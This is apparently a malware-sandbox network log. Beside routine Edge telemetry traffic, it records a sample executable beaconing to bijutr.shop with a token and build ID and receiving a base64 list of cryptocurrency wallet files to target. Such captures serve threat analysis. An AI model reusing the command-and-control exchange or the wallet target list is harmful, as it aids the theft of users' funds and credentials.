                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        29192.168.2.54986220.110.205.1194437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC1175OUTGET /c.gif?rnd=1735284048285&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5f47d732c1f847c1915dbc05f2d1c1c0&activityId=5f47d732c1f847c1915dbc05f2d1c1c0&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: c.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                        Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Location: https://c.bing.com/c.gif?rnd=1735284048285&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5f47d732c1f847c1915dbc05f2d1c1c0&activityId=5f47d732c1f847c1915dbc05f2d1c1c0&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=88BD196131DF4F6484A57ED6AE89D619&RedC=c.msn.com&MXFR=2BA4C89BEAD6644B32BDDDF9EBCF652E
                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                        Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                        Set-Cookie: MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; domain=.msn.com; expires=Wed, 21-Jan-2026 07:20:49 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:48 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        30192.168.2.54987318.238.49.1244437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC925OUTGET /b?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:49 GMT
                                                                                                                                                                                                                                                                        Location: /b2?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                        set-cookie: UID=14Ebfe52359236eb26440091735284049; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                        set-cookie: XID=14Ebfe52359236eb26440091735284049; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                        Via: 1.1 2260f0d6b734b81aaef20a0b1c178318.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: SxPPTFo3FCLZJ9Fk2jEiv0r2pmWFQy9rKErAXuibEjg7T1i5Zzg06Q==


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        31192.168.2.54991318.238.49.1244437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC1012OUTGET /b2?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: UID=14Ebfe52359236eb26440091735284049; XID=14Ebfe52359236eb26440091735284049
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:51 GMT
                                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                        Via: 1.1 876bec0443fc8f764d98d36e203f84e0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: PWEN7rW7d_iwYd1_FYzeoyYZemubwZDpqFoHv_pgreq3Ef9eNX0dXA==


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        32192.168.2.549911188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----PH4EU37QIEUAAASR9H4E
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------PH4EU37QIEUAAASR9H4ECont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:52 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        33192.168.2.54991052.168.117.1704437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735284048283&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 3868
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC3868OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 37 3a 32 30 3a 34 38 2e 32 37 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 33 65 38 38 66 61 62 32 2d 31 65 37 38 2d 34 65 32 32 2d 38 66 63 31 2d 31 37 63 39 35 34 39 61 39 61 64 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 34 30 33 36 34 31 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T07:20:48.278Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"3e88fab2-1e78-4e22-8fc1-17c9549a9ad3","epoch":"204036419"},"app":{"locale"
                                                                                                                                                                                                                                                                        2024-12-27 07:20:51 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=eb5f21d76f454e35bf3e7dbfb638270b&HASH=eb5f&LV=202412&V=4&LU=1735284051537; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 07:20:51 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: MS0=79676f7b3386401eb0e97882bb71fc89; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 07:50:51 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                        time-delta-millis: 3254
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:51 GMT
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        34192.168.2.54991920.110.205.1194437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:52 UTC1261OUTGET /c.gif?rnd=1735284048285&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5f47d732c1f847c1915dbc05f2d1c1c0&activityId=5f47d732c1f847c1915dbc05f2d1c1c0&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=88BD196131DF4F6484A57ED6AE89D619&MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E HTTP/1.1
                                                                                                                                                                                                                                                                        Host: c.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                        2024-12-27 07:20:52 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                        Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                        Set-Cookie: MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; domain=.msn.com; expires=Wed, 21-Jan-2026 07:20:52 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                        Set-Cookie: SRM_M=2BA4C89BEAD6644B32BDDDF9EBCF652E; domain=c.msn.com; expires=Wed, 21-Jan-2026 07:20:52 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                        Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 07:20:52 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                        Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 07:30:52 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:51 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Length: 42
